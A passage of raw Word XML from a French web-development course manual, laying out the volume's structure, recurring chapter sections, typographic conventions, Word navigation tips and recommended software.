          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — un regroupement thématique de cinq à huit chapitres, introduit par une page de partie.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b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Chapitre</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — une séquence complète : objectifs, cours, exemples, exercices corrigés, quiz et synthèse.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b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Section et sous-section</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — des unités de lecture de deux à six pages, numérotées (par exemple 12.3 ou 12.3.2).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Les rubriques récurrentes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Chaque chapitre suit le même déroulé, ce qui permet de s'orienter rapidement dans un volume de cette taille.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02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Rubrique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="386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Fonction</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="312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Quand l'utiliser</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2024"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>À l'issue de ce chapitre</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3863"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Objectifs mesurables</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3127"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Avant la lecture, pour cadrer l'effort</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="202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Cours</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="386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Explications, schémas, tableaux, exemples de code</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="312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Lecture active, éditeur ouvert</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2024"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Encadrés</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3863"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Définitions, bonnes pratiques, pièges, notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3127"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Pendant la lecture</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="202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Exercices d'application</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="386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Mise en pratique progressive</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="312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Après chaque section ou en fin de chapitre</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2024"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Corrigés détaillés</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3863"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Solution commentée et justifiée</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3127"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Après avoir cherché soi-même</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="202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Quiz de vérification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="386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Contrôle des acquis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="312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Sans revenir au texte</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2024"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>L'essentiel du chapitre</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3863"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Synthèse en cinq à huit points</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3127"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Avant de passer au chapitre suivant</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Conventions typographiques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13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Convention</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="426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Signification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="262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Exemple</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Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Gras</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4261"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Terme défini, notion clé, libellé d'interface</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2622"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>flux de mise en page</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2131"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7F9"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:i/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Italique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="426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Nuance, mot étranger, titre d'ouvrage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2622"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7F9"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:i/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>responsive design</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Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Police à chasse fixe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4261"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Élément de code, balise, propriété, commande</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2622"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>display: grid</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="213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Bloc grisé</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="426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Extrait de code exécutable ou configuration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="262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voir listing 3.1</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Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Cadre ambre</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4261"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Objectifs, méthode, point de vigilance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2622"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>encadré ci-dessus</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="213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Cadre vert</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="426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Bonne pratique validée</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="262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encadré « À retenir »</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Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Cadre rouge</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4261"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Erreur fréquente, risque de sécurité ou de perte de données</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2622"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>encadré « Attention »</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Travailler avec le fichier Word</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le document est entièrement stylé. Pour modifier l'apparence de tous les titres d'un niveau, modifiez le style correspondant (onglet Accueil, galerie Styles, clic droit sur « Titre 1 », « Modifier ») : la table des matières et la navigation suivent automatiquement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Pour régénérer la table des matières après une modification : cliquez dans le sommaire général, puis sur « Mettre à jour la table » ou appuyez sur F9. Choisissez « Mettre à jour toute la table » pour recalculer les numéros de page.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le volet de navigation (Affichage, Volet de navigation) permet de circuler entre cours, parties, chapitres et sections. La recherche (Ctrl+F) fonctionne sur l'ensemble du volume.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Environnement recommandé</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4507"/>
        <w:gridCol w:w="4507"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
          <w:tblHeader w:val="true"/>
        </w:trPr>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c>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="600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Recommandation</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Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Lecture</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6009"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Microsoft Word 2016 ou ultérieur, écran 13 pouces minimum</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Écriture de code</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="600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Visual Studio Code, avec les extensions HTML, CSS et JavaScript</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Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Navigation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6009"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Chrome, Firefox ou Edge, version à jour</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Terminal (cours 2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="600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Bash sous Linux, macOS ou WSL sous Windows</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Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Machines virtuelles</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6009"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
